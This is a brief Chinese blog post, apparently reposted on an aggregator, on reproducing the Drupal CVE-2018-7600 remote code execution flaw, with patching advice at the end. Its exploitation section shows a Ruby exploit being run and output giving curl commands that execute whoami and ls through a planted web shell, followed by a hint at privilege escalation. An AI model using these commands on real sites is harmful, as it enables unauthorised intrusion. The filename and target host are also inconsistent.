drupal CVE-2018-7600 复现

Posted Rightsec

tags:

篇首语:本文由小常识网(cha138.com)小编为大家整理,主要介绍了drupal CVE-2018-7600 复现相关的知识,希望对你有一定的参考价值。

1.系统环境

  • Drupal 7.5
  • linux 主机
  • ruby 代码

2.原理说明

 

Drupal 6.x,7.x,8.x

参考:CVE-2018-7600漏洞分析

 

3.利用

 在Python2.7 环境下运行poc即可验证

或者在Linux下安装ruby环境 并且运行 CVE-2018-7600.rb文件 

ruby CVE-2017-7600.rb 
ruby CVE-2018-7600.rb http://127.0.0.1:8089/drupal-8.5.0/ [*] Fake shell:   curl ‘http://47.98.122.11:8089/drupal-8.5.0/s.php‘ -d ‘c=whoami‘
[*] Fake shell:   curl ‘http://47.98.122.11:8089/drupal-8.5.0/s.php‘ -d ‘c=ls‘

最后可以查找系统漏洞进行提权

4.修复

主要支持版本推荐更新到Drupal相应的最新子版本

 参考 drupal官网

以上是关于drupal CVE-2018-7600 复现的主要内容,如果未能解决你的问题,请参考以下文章

转:Uncovering Drupalgeddon 2(cve-2018-7600)漏洞深度解析

[CVE-2014-3704]Drupal 7.31 SQL注入漏洞分析与复现

Drupal Core 8 PECL YAML 反序列化任意代码执行漏洞(CVE-2017-6920

应用安全 - 框架 | 工具 - Drupal - 漏洞 - 汇总

视觉工作室代码中的 Drupal 8

自动将 drupal 7 内容类型转换为代码。内容类型生成器代码?